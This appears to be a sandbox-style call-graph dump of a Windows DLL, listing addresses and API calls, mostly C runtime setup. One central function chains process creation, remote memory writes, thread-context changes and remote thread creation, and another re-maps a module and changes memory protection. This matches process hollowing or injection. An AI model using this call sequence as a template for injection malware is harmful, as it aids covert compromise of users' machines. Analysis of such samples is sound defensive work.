10131->10148 10135 6cf30a33 ___vcrt_uninitialize_locks DeleteCriticalSection 10133->10135 10134->10120 10136 6cf309a9 10134->10136 10135->10134 10167 6cf30b76 10136->10167 10139 6cf309be 10139->10117 10142 6cf309d9 10142->10117 10145 6cf30a5d 10144->10145 10146 6cf30a3e 10144->10146 10145->10120 10147 6cf30a48 DeleteCriticalSection 10146->10147 10147->10145 10147->10147 10153 6cf30b2d 10148->10153 10151 6cf30c9d InitializeCriticalSectionAndSpinCount 10152 6cf30c88 10151->10152 10152->10131 10154 6cf30b68 10153->10154 10155 6cf30b45 10153->10155 10154->10151 10154->10152 10155->10154 10159 6cf30a93 10155->10159 10158 6cf30b5a GetProcAddress 10158->10154 10165 6cf30a9f ___vcrt_FlsSetValue 10159->10165 10160 6cf30b13 10160->10154 10160->10158 10161 6cf30ab5 LoadLibraryExW 10162 6cf30ad3 GetLastError 10161->10162 10163 6cf30b1a 10161->10163 10162->10165 10163->10160 10164 6cf30b22 FreeLibrary 10163->10164 10164->10160 10165->10160 10165->10161 10166 6cf30af5 LoadLibraryExW 10165->10166 10166->10163 10166->10165 10168 6cf30b2d ___vcrt_FlsSetValue 5 API calls 10167->10168 10169 6cf30b90 10168->10169 10170 6cf30ba9 TlsAlloc 10169->10170 10171 6cf309b3 10169->10171 10171->10139 10172 6cf30c27 10171->10172 10173 6cf30b2d ___vcrt_FlsSetValue 5 API calls 10172->10173 10174 6cf30c41 10173->10174 10175 6cf30c5c TlsSetValue 10174->10175 10176 6cf309cc 10174->10176 10175->10176 10176->10142 10177 6cf309dc 10176->10177 10178 6cf309e6 10177->10178 10180 6cf309ec 10177->10180 10181 6cf30bb1 10178->10181 10180->10139 10182 6cf30b2d ___vcrt_FlsSetValue 5 API calls 10181->10182 10183 6cf30bcb 10182->10183 10184 6cf30be3 TlsFree 10183->10184 10185 6cf30bd7 10183->10185 10184->10185 10185->10180 10187 6cf340ce 10186->10187 10188 6cf2f7c2 10186->10188 10187->10188 10190 6cf33f7e 10187->10190 10188->10097 10188->10124 10193 6cf33f85 10190->10193 10191 6cf33fc8 GetStdHandle 10191->10193 10192 6cf3402e 10192->10187 10193->10191 10193->10192 10194 6cf33fdb GetFileType 10193->10194 10194->10193 10196 6cf2f7e0 10195->10196 10197 6cf2f7e4 10195->10197 10196->10101 10198 6cf2f93a __DllMainCRTStartup@12 4 API calls 10197->10198 10199 6cf2f7f1 ___scrt_release_startup_lock 10197->10199 10200 6cf2f85a 10198->10200 10199->10101 10207 6cf31f7b 10201->10207 10204 6cf305eb 10273 6cf308d3 10204->10273 10208 6cf2f72f 10207->10208 10209 6cf31f85 10207->10209 10208->10204 10210 6cf33cf2 _free 6 API calls 10209->10210 10211 6cf31f8c 10210->10211 10211->10208 10212 6cf33d31 _free 6 API calls 10211->10212 10213 6cf31f9f 10212->10213 10215 6cf31e42 10213->10215 10216 6cf31e5d 10215->10216 10217 6cf31e4d 10215->10217 10216->10208 10221 6cf31e63 10217->10221 10220 6cf325a4 _free 14 API calls 10220->10216 10222 6cf31e7e 10221->10222 10223 6cf31e78 10221->10223 10225 6cf325a4 _free 14 API calls 10222->10225 10224 6cf325a4 _free 14 API calls 10223->10224 10224->10222 10226 6cf31e8a 10225->10226 10227 6cf325a4 _free 14 API calls 10226->10227 10228 6cf31e95 10227->10228 10229 6cf325a4 _free 14 API calls 10228->10229 10230 6cf31ea0 10229->10230 10231 6cf325a4 _free 14 API calls 10230->10231 10232 6cf31eab 10231->10232 10233 6cf325a4 _free 14 API calls 10232->10233 10234 6cf31eb6 10233->10234 10235 6cf325a4 _free 14 API calls 10234->10235 10236 6cf31ec1 10235->10236 10237 6cf325a4 _free 14 API calls 10236->10237 10238 6cf31ecc 10237->10238 10239 6cf325a4 _free 14 API calls 10238->10239 10240 6cf31ed7 10239->10240 10241 6cf325a4 _free 14 API calls 10240->10241 10242 6cf31ee5 10241->10242 10247 6cf31c8f 10242->10247 10248 6cf31c9b ___scrt_is_nonwritable_in_current_image 10247->10248 10263 6cf3223b EnterCriticalSection 10248->10263 10250 6cf31ccf 10264 6cf31cee 10250->10264 10253 6cf31ca5 10253->10250 10254 6cf325a4 _free 14 API calls 10253->10254 10254->10250 10255 6cf31cfa 10256 6cf31d06 ___scrt_is_nonwritable_in_current_image 10255->10256 10268 6cf3223b EnterCriticalSection 10256->10268 10258 6cf31d10 10259 6cf31f30 _free 14 API calls 10258->10259 10260 6cf31d23 10259->10260 10269 6cf31d43 10260->10269 10263->10253 10267 6cf32283 LeaveCriticalSection 10264->10267 10266 6cf31cdc 10266->10255 10267->10266 10268->10258 10272 6cf32283 LeaveCriticalSection 10269->10272 10271 6cf31d31 10271->10220 10272->10271 10274 6cf308e0 10273->10274 10280 6cf2f734 10273->10280 10277 6cf308ee 10274->10277 10281 6cf30bec 10274->10281 10276 6cf30c27 ___vcrt_FlsSetValue 6 API calls 10278 6cf308fe 10276->10278 10277->10276 10286 6cf308b7 10278->10286 10280->10033 10282 6cf30b2d ___vcrt_FlsSetValue 5 API calls 10281->10282 10283 6cf30c06 10282->10283 10284 6cf30c1e TlsGetValue 10283->10284 10285 6cf30c12 10283->10285 10284->10285 10285->10277 10287 6cf308ce 10286->10287 10288 6cf308c1 10286->10288 10287->10280 10288->10287 10290 6cf31a14 10288->10290 10291 6cf325a4 _free 14 API calls 10290->10291 10292 6cf31a2c 10291->10292 10292->10287 10299 6cf30917 10293->10299 10295 6cf2f710 10295->10060 10296 6cf31983 10295->10296 10297 6cf320ff _free 14 API calls 10296->10297 10298 6cf2f71c 10297->10298 10298->10058 10298->10059 10300 6cf30923 GetLastError 10299->10300 10301 6cf30920 10299->10301 10302 6cf30bec ___vcrt_FlsGetValue 6 API calls 10300->10302 10301->10295 10303 6cf30938 10302->10303 10304 6cf3099d SetLastError 10303->10304 10305 6cf30c27 ___vcrt_FlsSetValue 6 API calls 10303->10305 10312 6cf30957 10303->10312 10304->10295 10306 6cf30951 10305->10306 10307 6cf30979 10306->10307 10309 6cf30c27 ___vcrt_FlsSetValue 6 API calls 10306->10309 10306->10312 10308 6cf30c27 ___vcrt_FlsSetValue 6 API calls 10307->10308 10310 6cf3098d 10307->10310 10308->10310 10309->10307 10311 6cf31a14 ___std_type_info_destroy_list 14 API calls 10310->10311 10311->10312 10312->10304 10314 6cf2f770 ___scrt_release_startup_lock 10313->10314 10315 6cf2f774 10314->10315 10318 6cf2f780 __DllMainCRTStartup@12 10314->10318 10338 6cf317fe 10315->10338 10319 6cf2f78d 10318->10319 10341 6cf31061 10318->10341 10319->10068 10408 6cf3059e InterlockedFlushSList 10322->10408 10326 6cf2f918 10325->10326 10327 6cf2f2be 10326->10327 10412 6cf31996 10326->10412 10331 6cf2f2fa 10327->10331 10329 6cf2f926 10330 6cf305f6 ___scrt_uninitialize_crt 7 API calls 10329->10330 10330->10327 10525 6cf2f78e 10331->10525 10337 6cf2e264 10334->10337 10335 6cf2f0f0 _ValidateLocalCookies 5 API calls 10336 6cf2f036 10335->10336 10336->10081 10336->10084 10337->10335 10352 6cf316c9 10338->10352 10342 6cf3106f 10341->10342 10351 6cf31080 10341->10351 10369 6cf31107 GetModuleHandleW 10342->10369 10346 6cf310ba 10346->10068 10376 6cf30f27 10351->10376 10353 6cf316d5 ___scrt_is_nonwritable_in_current_image 10352->10353 10360 6cf3223b EnterCriticalSection 10353->10360 10355 6cf316e3 10361 6cf31724 10355->10361 10360->10355 10362 6cf316f0 10361->10362 10363 6cf31743 10361->10363 10365 6cf31718 10362->10365 10363->10362 10364 6cf325a4 _free 14 API calls 10363->10364 10364->10362 10368 6cf32283 LeaveCriticalSection 10365->10368 10367 6cf2f77e 10367->10068 10368->10367 10370 6cf31074 10369->10370 10370->10351 10371 6cf3114a GetModuleHandleExW 10370->10371 10372 6cf31169 GetProcAddress 10371->10372 10375 6cf3117e 10371->10375 10372->10375 10373 6cf31192 FreeLibrary 10374 6cf3119b 10373->10374 10374->10351 10375->10373 10375->10374 10377 6cf30f33 ___scrt_is_nonwritable_in_current_image 10376->10377 10392 6cf3223b EnterCriticalSection 10377->10392 10379 6cf30f3d 10393 6cf30f74 10379->10393 10381 6cf30f4a 10397 6cf30f68 10381->10397 10384 6cf310c5 10401 6cf3229a GetPEB 10384->10401 10387 6cf310f4 10390 6cf3114a __DllMainCRTStartup@12 3 API calls 10387->10390 10388 6cf310d4 GetPEB 10388->10387 10389 6cf310e4 GetCurrentProcess TerminateProcess 10388->10389 10389->10387 10391 6cf310fc ExitProcess 10390->10391 10392->10379 10394 6cf30f80 ___scrt_is_nonwritable_in_current_image 10393->10394 10395 6cf317fe __DllMainCRTStartup@12 14 API calls 10394->10395 10396 6cf30fe1 __DllMainCRTStartup@12 10394->10396 10395->10396 10396->10381 10400 6cf32283 LeaveCriticalSection 10397->10400 10399 6cf30f56 10399->10346 10399->10384 10400->10399 10402 6cf322b4 10401->10402 10404 6cf310cf 10401->10404 10405 6cf33c15 10402->10405 10404->10387 10404->10388 10406 6cf33b92 _free 5 API calls 10405->10406 10407 6cf33c31 10406->10407 10407->10404 10409 6cf2f631 10408->10409 10410 6cf305ae 10408->10410 10409->10073 10410->10409 10411 6cf31a14 ___std_type_info_destroy_list 14 API calls 10410->10411 10411->10410 10413 6cf319b3 ___scrt_uninitialize_crt 10412->10413 10414 6cf319a1 10412->10414 10413->10329 10415 6cf319af 10414->10415 10417 6cf347d8 10414->10417 10415->10329 10420 6cf34686 10417->10420 10423 6cf345da 10420->10423 10424 6cf345e6 ___scrt_is_nonwritable_in_current_image 10423->10424 10431 6cf3223b EnterCriticalSection 10424->10431 10426 6cf3465c 10440 6cf3467a 10426->10440 10428 6cf345f0 ___scrt_uninitialize_crt 10428->10426 10432 6cf3454e 10428->10432 10431->10428 10433 6cf3455a ___scrt_is_nonwritable_in_current_image 10432->10433 10443 6cf348f5 EnterCriticalSection 10433->10443 10435 6cf34564 ___scrt_uninitialize_crt 10439 6cf3459d 10435->10439 10444 6cf34790 10435->10444 10454 6cf345ce 10439->10454 10524 6cf32283 LeaveCriticalSection 10440->10524 10442 6cf34668 10442->10415 10443->10435 10445 6cf347a6 10444->10445 10446 6cf3479d 10444->10446 10457 6cf3472b 10445->10457 10447 6cf34686 ___scrt_uninitialize_crt 66 API calls 10446->10447 10450 6cf347a3 10447->10450 10450->10439 10452 6cf347c2 10470 6cf35df2 10452->10470 10523 6cf34909 LeaveCriticalSection 10454->10523 10456 6cf345bc 10456->10428 10458 6cf34743 10457->10458 10459 6cf34768 10457->10459 10458->10459 10460 6cf34b21 ___scrt_uninitialize_crt 25 API calls 10458->10460 10459->10450 10463 6cf34b21 10459->10463 10461 6cf34761 10460->10461 10481 6cf365ea 10461->10481 10464 6cf34b42 10463->10464 10465 6cf34b2d 10463->10465 10464->10452 10466 6cf32534 _free 14 API calls 10465->10466 10467 6cf34b32 10466->10467 10506 6cf32477 10467->10506 10471 6cf35e03 10470->10471 10474 6cf35e10 10470->10474 10472 6cf32534 _free 14 API calls 10471->10472 10476 6cf35e08 10472->10476 10473 6cf35e59 10475 6cf32534 _free 14 API calls 10473->10475 10474->10473 10477 6cf35e37 10474->10477 10478 6cf35e5e 10475->10478 10476->10450 10509 6cf35d50 10477->10509 10480 6cf32477 __fassign 25 API calls 10478->10480 10480->10476 10482 6cf365f6 ___scrt_is_nonwritable_in_current_image 10481->10482 10483 6cf36616 10482->10483 10484 6cf365fe 10482->10484 10485 6cf366b1 10483->10485 10490 6cf36648 10483->10490 10486 6cf32521 __dosmaperr 14 API calls 10484->10486 10487 6cf32521 __dosmaperr 14 API calls 10485->10487 10488 6cf36603 10486->10488 10489 6cf366b6 10487->10489 10491 6cf32534 _free 14 API calls 10488->10491 10493 6cf32534 _free 14 API calls 10489->10493 10494 6cf35c0f ___scrt_uninitialize_crt EnterCriticalSection 10490->10494 10492 6cf3660b 10491->10492 10492->10459 10495 6cf366be 10493->10495 10496 6cf3664e 10494->10496 10497 6cf32477 __fassign 25 API calls 10495->10497 10498 6cf3666a 10496->10498 10499 6cf3667f 10496->10499 10497->10492 10500 6cf32534 _free 14 API calls 10498->10500 10501 6cf366dc ___scrt_uninitialize_crt 60 API calls 10499->10501 10502 6cf3666f 10500->10502 10503 6cf3667a 10501->10503 10504 6cf32521 __dosmaperr 14 API calls 10502->10504 10505 6cf366a9 ___scrt_uninitialize_crt LeaveCriticalSection 10503->10505 10504->10503 10505->10492 10507 6cf32413 __fassign 25 API calls 10506->10507 10508 6cf32483 10507->10508 10508->10452 10510 6cf35d5c ___scrt_is_nonwritable_in_current_image 10509->10510 10511 6cf35c0f ___scrt_uninitialize_crt EnterCriticalSection 10510->10511 10512 6cf35d6b 10511->10512 10513 6cf35db2 10512->10513 10515 6cf35ce6 ___scrt_uninitialize_crt 25 API calls 10512->10515 10514 6cf32534 _free 14 API calls 10513->10514 10516 6cf35db7 10514->10516 10517 6cf35d97 FlushFileBuffers 10515->10517 10520 6cf35de6 ___scrt_uninitialize_crt LeaveCriticalSection 10516->10520 10517->10516 10518 6cf35da3 10517->10518 10519 6cf32521 __dosmaperr 14 API calls 10518->10519 10521 6cf35da8 GetLastError 10519->10521 10522 6cf35dcf 10520->10522 10521->10513 10522->10476 10523->10456 10524->10442 10530 6cf319c6 10525->10530 10528 6cf309dc ___vcrt_uninitialize_ptd 6 API calls 10529 6cf2f2ff 10528->10529 10529->10062 10533 6cf321e0 10530->10533 10534 6cf2f795 10533->10534 10535 6cf321ea 10533->10535 10534->10528 10537 6cf33cb3 10535->10537 10538 6cf33b92 _free 5 API calls 10537->10538 10539 6cf33ccf 10538->10539 10540 6cf33cea TlsFree 10539->10540 10541 6cf33cd8 10539->10541 10541->10534 10542 6cf2f43e 10543 6cf2f447 10542->10543 10544 6cf2f44c 10542->10544 10563 6cf2f5d0 10543->10563 10548 6cf2f308 10544->10548 10549 6cf2f314 ___scrt_is_nonwritable_in_current_image 10548->10549 10550 6cf2f33d dllmain_raw 10549->10550 10551 6cf2f338 10549->10551 10560 6cf2f323 10549->10560 10552 6cf2f357 dllmain_crt_dispatch 10550->10552 10550->10560 10553 6cf2e200 __DllMainCRTStartup@12 5 API calls 10551->10553 10552->10551 10552->10560 10554 6cf2f378 10553->10554 10555 6cf2f3a9 10554->10555 10558 6cf2e200 __DllMainCRTStartup@12 5 API calls 10554->10558 10556 6cf2f3b2 dllmain_crt_dispatch 10555->10556 10555->10560 10557 6cf2f3c5 dllmain_raw 10556->10557 10556->10560 10557->10560 10559 6cf2f390 10558->10559 10561 6cf2f258 __DllMainCRTStartup@12 84 API calls 10559->10561 10562 6cf2f39e dllmain_raw 10561->10562 10562->10555 10564 6cf2f5e6 10563->10564 10566 6cf2f5ef 10564->10566 10567 6cf2f583 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 10564->10567 10566->10544 10567->10566 10989 6cf33ebf GetStartupInfoW 10990 6cf33ee5 10989->10990 10991 6cf33f79 10989->10991 10990->10991 10995 6cf35b71 10990->10995 10993 6cf33f0d 10993->10991 10994 6cf33f3d GetFileType 10993->10994 10994->10993 10996 6cf35b7d ___scrt_is_nonwritable_in_current_image 10995->10996 10997 6cf35ba7 10996->10997 10998 6cf35b86 10996->10998 11008 6cf3223b EnterCriticalSection 10997->11008 11000 6cf32534 _free 14 API calls 10998->11000 11001 6cf35b8b 11000->11001 11002 6cf32477 __fassign 25 API calls 11001->11002 11004 6cf35b95 11002->11004 11003 6cf35bdf 11016 6cf35c06 11003->11016 11004->10993 11007 6cf35bb3 11007->11003 11009 6cf35ac1 11007->11009 11008->11007 11010 6cf32547 _free 14 API calls 11009->11010 11013 6cf35ad3 11010->11013 11011 6cf35ae0 11012 6cf325a4 _free 14 API calls 11011->11012 11014 6cf35b35 11012->11014 11013->11011 11019 6cf33d73 11013->11019 11014->11007 11024 6cf32283 LeaveCriticalSection 11016->11024 11018 6cf35c0d 11018->11004 11020 6cf33b92 _free 5 API calls 11019->11020 11021 6cf33d8f 11020->11021 11022 6cf33dad InitializeCriticalSectionAndSpinCount 11021->11022 11023 6cf33d98 11021->11023 11022->11023 11023->11013 11024->11018 11222 6cf3187e 11225 6cf3168d 11222->11225 11226 6cf3169c 11225->11226 11227 6cf315ff 14 API calls 11226->11227 11228 6cf316b6 11227->11228 11229 6cf315ff 14 API calls 11228->11229 11230 6cf316c1 11229->11230 11639 6cf32d7e 11640 6cf32d90 11639->11640 11641 6cf32d8c 11639->11641 11642 6cf32d95 11640->11642 11643 6cf32dbb 11640->11643 11644 6cf32547 _free 14 API calls 11642->11644 11643->11641 11650 6cf33a10 11643->11650 11645 6cf32d9e 11644->11645 11647 6cf325a4 _free 14 API calls 11645->11647 11647->11641 11648 6cf32ddb 11649 6cf325a4 _free 14 API calls 11648->11649 11649->11641 11651 6cf33a38 11650->11651 11652 6cf33a1d 11650->11652 11654 6cf33a47 11651->11654 11659 6cf359a9 11651->11659 11652->11651 11653 6cf33a29 11652->11653 11655 6cf32534 _free 14 API calls 11653->11655 11666 6cf359dc 11654->11666 11658 6cf33a2e __DllMainCRTStartup@12 11655->11658 11658->11648 11660 6cf359b4 11659->11660 11661 6cf359c9 HeapSize 11659->11661 11662 6cf32534 _free 14 API calls 11660->11662 11661->11654 11663 6cf359b9 11662->11663 11664 6cf32477 __fassign 25 API calls 11663->11664 11665 6cf359c4 11664->11665 11665->11654 11667 6cf359f4 11666->11667 11668 6cf359e9 11666->11668 11670 6cf359fc 11667->11670 11676 6cf35a05 _free 11667->11676 11669 6cf3491d 15 API calls 11668->11669 11675 6cf359f1 11669->11675 11671 6cf325a4 _free 14 API calls 11670->11671 11671->11675 11672 6cf35a0a 11674 6cf32534 _free 14 API calls 11672->11674 11673 6cf35a2f HeapReAlloc 11673->11675 11673->11676 11674->11675 11675->11658 11676->11672 11676->11673 11677 6cf34166 _free 2 API calls 11676->11677 11677->11676 11025 6cf318bd 11028 6cf31943 11025->11028 11029 6cf31957 11028->11029 11031 6cf318d0 11028->11031 11030 6cf325a4 _free 14 API calls 11029->11030 11029->11031 11030->11031 9685 6cf26ca0 9707 6cf26cff __DllMainCRTStartup@12 9685->9707 9686 6cf2abd4 NtWriteVirtualMemory 9757 6cf26670 9686->9757 9688 6cf2ce87 CloseHandle 9688->9707 9689 6cf2c171 NtWriteVirtualMemory 9689->9707 9690 6cf2e1b8 CloseHandle 9690->9707 9691 6cf2e105 CloseHandle 9691->9707 9694 6cf2e1dc CloseHandle 9694->9707 9695 6cf2da97 NtSetContextThread NtResumeThread 9695->9707 9696 6cf2da0f NtCreateThreadEx 9696->9707 9697 6cf29b18 NtAllocateVirtualMemory 9697->9707 9698 6cf28e68 VirtualAlloc 9698->9707 9699 6cf2d215 9765 6cf2f0f0 9699->9765 9701 6cf2d21f 9702 6cf28aaf GetConsoleWindow 9702->9707 9703 6cf2dcf7 VirtualAlloc 9703->9707 9704 6cf297c1 NtGetContextThread 9704->9707 9705 6cf28b6c ShowWindow 9725 6cf21300 9705->9725 9707->9686 9707->9688 9707->9689 9707->9690 9707->9691 9707->9694 9707->9695 9707->9696 9707->9697 9707->9698 9707->9699 9707->9702 9707->9703 9707->9704 9707->9705 9708 6cf21300 24 API calls 9707->9708 9710 6cf2d030 CloseHandle 9707->9710 9711 6cf2cc7b NtSetContextThread NtResumeThread 9707->9711 9712 6cf2d335 CreateProcessW 9707->9712 9713 6cf2db57 CloseHandle 9707->9713 9714 6cf2a33e NtWriteVirtualMemory 9707->9714 9715 6cf29e18 NtWriteVirtualMemory 9707->9715 9716 6cf29687 CreateProcessW 9707->9716 9717 6cf2d236 VirtualAlloc 9707->9717 9718 6cf2c93b NtCreateThreadEx 9707->9718 9719 6cf2dde8 9707->9719 9722 6cf2bd70 NtWriteVirtualMemory 9707->9722 9723 6cf2bbeb NtReadVirtualMemory 9707->9723 9724 6cf2dc3a CloseHandle 9707->9724 9748 6cf25c40 9707->9748 9761 6cf21000 9707->9761 9708->9707 9710->9707 9711->9707 9712->9707 9713->9707 9714->9707 9715->9707 9716->9707 9717->9707 9718->9707 9720 6cf25c40 8 API calls 9719->9720 9721 6cf2ddfb NtAllocateVirtualMemory 9720->9721 9721->9707 9722->9707 9723->9707 9724->9707 9731 6cf21329 ___scrt_uninitialize_crt 9725->9731 9726 6cf23fcc CloseHandle 9726->9731 9727 6cf240bf CloseHandle 9727->9731 9728 6cf22636 CreateFileMappingA 9728->9731 9729 6cf221bc K32GetModuleInformation 9729->9731 9730 6cf236fd CloseHandle 9730->9731 9731->9726 9731->9727 9731->9728 9731->9729 9731->9730 9732 6cf2329e VirtualProtect 9731->9732 9733 6cf22a39 MapViewOfFile 9731->9733 9734 6cf22255 GetModuleFileNameA CreateFileA 9731->9734 9735 6cf23773 CloseHandle CloseHandle 9731->9735 9736 6cf21ffe GetCurrentProcess 9731->9736 9739 6cf23b2b GetModuleFileNameA CreateFileA 9731->9739 9740 6cf22901 CloseHandle 9731->9740 9741 6cf23ac3 GetCurrentProcess 9731->9741 9744 6cf23ab1 9731->9744 9747 6cf2337b VirtualProtect 9731->9747 9732->9731 9733->9731 9734->9731 9735->9731 9772 6cf2fd20 9736->9772 9739->9731 9740->9731 9742 6cf2fd20 __DllMainCRTStartup@12 9741->9742 9743 6cf23af2 GetModuleHandleA 9742->9743 9743->9731 9745 6cf2f0f0 _ValidateLocalCookies 5 API calls 9744->9745 9746 6cf23abb 9745->9746 9746->9707 9747->9731 9754 6cf25c91 __DllMainCRTStartup@12 9748->9754 9749 6cf2606a GetModuleHandleW 9749->9754 9750 6cf265f7 GetModuleHandleW 9750->9754 9751 6cf26584 9752 6cf2f0f0 _ValidateLocalCookies 5 API calls 9751->9752 9753 6cf26594 NtAllocateVirtualMemory 9752->9753 9753->9707 9754->9749 9754->9750 9754->9751 9755 6cf24160 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9754->9755 9756 6cf2626f NtQueryInformationProcess 9754->9756 9755->9754 9756->9754 9758 6cf266ce 9757->9758 9759 6cf2f0f0 _ValidateLocalCookies 5 API calls 9758->9759 9760 6cf26c36 9759->9760 9760->9707 9764 6cf2105f 9761->9764 9762 6cf2f0f0 _ValidateLocalCookies 5 API calls 9763 6cf212e0 9762->9763 9763->9707 9764->9762 9766 6cf2f0f8 9765->9766 9767 6cf2f0f9 IsProcessorFeaturePresent 9765->9767 9766->9701 9769 6cf2f49e 9767->9769 9774 6cf2f461 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9769->9774 9771 6cf2f581 9771->9701 9773 6cf2202d GetModuleHandleA 9772->9773 9773->9731 9774->9771 11339 6cf37221 11340 6cf37241 11339->11340 11343 6cf37278 11340->11343 11342 6cf3726b 11344 6cf3727f 11343->11344 11345 6cf372e0 11344->11345 11349 6cf3729f 11344->11349 11346 6cf38007 20 API calls 11345->11346 11347 6cf37efe 11345->11347 11348 6cf3732e 11346->11348 11347->11342 11348->11342 11349->11347 11350 6cf38007 20 API calls 11349->11350 11351 6cf37f2e 11350->11351 11351->11342 11367 6cf347e1 11368 6cf347ee 11367->11368 11369 6cf32547 _free 14 API calls 11368->11369 11370 6cf34808 11369->11370 11371 6cf325a4 _free 14 API calls 11370->11371 11372 6cf34814 11371->11372 11373 6cf3483a 11372->11373 11374 6cf32547 _free 14 API calls 11372->11374 11375 6cf33d73 6 API calls 11373->11375 11378 6cf34846 11373->11378 11379 6cf348a4 11373->11379 11376 6cf3482e 11374->11376 11375->11373 11377 6cf325a4 _free 14 API calls 11376->11377 11377->11373 11510 6cf355a0 11513 6cf355b7 11510->11513 11512 6cf355b2 11514 6cf355c5 11513->11514 11515 6cf355d9 11513->11515 11518 6cf32534 _free 14 API calls 11514->11518 11516 6cf355f3 11515->11516 11517 6cf355e1 11515->11517 11522 6cf31acd __fassign 37 API calls 11516->11522 11525 6cf355f1 11516->11525 11519 6cf32534 _free 14 API calls 11517->11519 11520 6cf355ca 11518->11520 11521 6cf355e6 11519->11521 11523 6cf32477 __fassign 25 API calls 11520->11523 11524 6cf32477 __fassign 25 API calls 11521->11524 11522->11525 11526 6cf355d5 11523->11526 11524->11525 11525->11512 11526->11512 11678 6cf37760 11681 6cf3777e 11678->11681 11680 6cf37776 11682 6cf37783 11681->11682 11685 6cf37818 11682->11685 11686 6cf38043 11682->11686 11685->11680 11687 6cf38056 DecodePointer 11686->11687 11688 6cf38066 11686->11688 11687->11688 11689 6cf380aa 11688->11689 11690 6cf379af 11688->11690 11691 6cf38095 11688->11691 11689->11690 11692 6cf32534 _free 14 API calls 11689->11692 11690->11680 11691->11690 11693 6cf32534 _free 14 API calls 11691->11693 11692->11690 11693->11690 11032 6cf348a9 11033 6cf347d8 ___scrt_uninitialize_crt 66 API calls 11032->11033 11034 6cf348b1 11033->11034 11042 6cf368b6 11034->11042 11036 6cf348b6 11052 6cf36961 11036->11052 11039 6cf348e0 11040 6cf325a4 _free 14 API calls 11039->11040 11041 6cf348eb 11040->11041 11043 6cf368c2 ___scrt_is_nonwritable_in_current_image 11042->11043 11056 6cf3223b EnterCriticalSection 11043->11056 11045 6cf36939 11070 6cf36958 11045->11070 11047 6cf368cd 11047->11045 11049 6cf3690d DeleteCriticalSection 11047->11049 11057 6cf36feb 11047->11057 11051 6cf325a4 _free 14 API calls 11049->11051 11051->11047 11053 6cf36978 11052->11053 11054 6cf348c5 DeleteCriticalSection 11052->11054 11053->11054 11055 6cf325a4 _free 14 API calls 11053->11055 11054->11036 11054->11039 11055->11054 11056->11047 11058 6cf36ff7 ___scrt_is_nonwritable_in_current_image 11057->11058 11059 6cf37001 11058->11059 11060 6cf37016 11058->11060 11061 6cf32534 _free 14 API calls 11059->11061 11066 6cf37011 11060->11066 11073 6cf348f5 EnterCriticalSection 11060->11073 11062 6cf37006 11061->11062 11064 6cf32477 __fassign 25 API calls 11062->11064 11064->11066 11065 6cf37033 11074 6cf36f74 11065->11074 11066->11047 11068 6cf3703e 11090 6cf37065 11068->11090 11170 6cf32283 LeaveCriticalSection 11070->11170 11072 6cf36945 11072->11036 11073->11065 11075 6cf36f81 11074->11075 11076 6cf36f96 11074->11076 11077 6cf32534 _free 14 API calls 11075->11077 11078 6cf3472b ___scrt_uninitialize_crt 62 API calls 11076->11078 11081 6cf36f91 11076->11081 11079 6cf36f86 11077->11079 11082 6cf36fab 11078->11082 11080 6cf32477 __fassign 25 API calls 11079->11080 11080->11081 11081->11068 11083 6cf36961 14 API calls 11082->11083 11084 6cf36fb3 11083->11084 11085 6cf34b21 ___scrt_uninitialize_crt 25 API calls 11084->11085 11086 6cf36fb9 11085->11086 11093 6cf375e7 11086->11093 11089 6cf325a4 _free 14 API calls 11089->11081 11169 6cf34909 LeaveCriticalSection 11090->11169 11092 6cf3706d 11092->11066 11094 6cf375f8 11093->11094 11095 6cf3760d 11093->11095 11108 6cf32521 11094->11108 11096 6cf37656 11095->11096 11101 6cf37634 11095->11101 11099 6cf32521 __dosmaperr 14 API calls 11096->11099 11102 6cf3765b 11099->11102 11100 6cf32534 _free 14 API calls 11105 6cf36fbf 11100->11105 11111 6cf3755b 11101->11111 11104 6cf32534 _free 14 API calls 11102->11104 11106 6cf37663 11104->11106 11105->11081 11105->11089 11107 6cf32477 __fassign 25 API calls 11106->11107 11107->11105 11109 6cf320ff _free 14 API calls 11108->11109 11110 6cf32526 11109->11110 11110->11100 11112 6cf37567 ___scrt_is_nonwritable_in_current_image 11111->11112 11122 6cf35c0f EnterCriticalSection 11112->11122 11114 6cf37575 11115 6cf375a7 11114->11115 11116 6cf3759c 11114->11116 11118 6cf32534 _free 14 API calls 11115->11118 11123 6cf37674 11116->11123 11119 6cf375a2 11118->11119 11138 6cf375db 11119->11138 11122->11114 11141 6cf35ce6 11123->11141 11125 6cf3768a 11154 6cf35c55 11125->11154 11127 6cf37684 11127->11125 11129 6cf35ce6 ___scrt_uninitialize_crt 25 API calls 11127->11129 11137 6cf376bc 11127->11137 11132 6cf376b3 11129->11132 11130 6cf35ce6 ___scrt_uninitialize_crt 25 API calls 11133 6cf376c8 CloseHandle 11130->11133 11131 6cf37704 11131->11119 11136 6cf35ce6 ___scrt_uninitialize_crt 25 API calls 11132->11136 11133->11125 11134 6cf376d4 GetLastError 11133->11134 11134->11125 11136->11137 11137->11125 11137->11130 11168 6cf35c32 LeaveCriticalSection 11138->11168 11140 6cf375c4 11140->11105 11142 6cf35cf3 11141->11142 11143 6cf35d08 11141->11143 11144 6cf32521 __dosmaperr 14 API calls 11142->11144 11145 6cf32521 __dosmaperr 14 API calls 11143->11145 11149 6cf35d2d 11143->11149 11146 6cf35cf8 11144->11146 11147 6cf35d38 11145->11147 11148 6cf32534 _free 14 API calls 11146->11148 11150 6cf32534 _free 14 API calls 11147->11150 11151 6cf35d00 11148->11151 11149->11127 11152 6cf35d40 11150->11152 11151->11127 11153 6cf32477 __fassign 25 API calls 11152->11153 11153->11151 11155 6cf35c64 11154->11155 11156 6cf35ccb 11154->11156 11155->11156 11162 6cf35c8e 11155->11162 11157 6cf32534 _free 14 API calls 11156->11157 11158 6cf35cd0 11157->11158 11159 6cf32521 __dosmaperr 14 API calls 11158->11159 11160 6cf35cbb 11159->11160 11160->11131 11163 6cf324fe 11160->11163 11161 6cf35cb5 SetStdHandle 11161->11160 11162->11160 11162->11161 11164 6cf32521 __dosmaperr 14 API calls 11163->11164 11165 6cf32509 _free 11164->11165 11166 6cf32534 _free 14 API calls 11165->11166 11167 6cf3251c 11166->11167 11167->11131 11168->11140 11169->11092 11170->11072 11231 6cf3726f 11232 6cf37278 11231->11232 11233 6cf372e0 11232->11233 11234 6cf3729f 11232->11234 11235 6cf37efe 11233->11235 11240 6cf38007 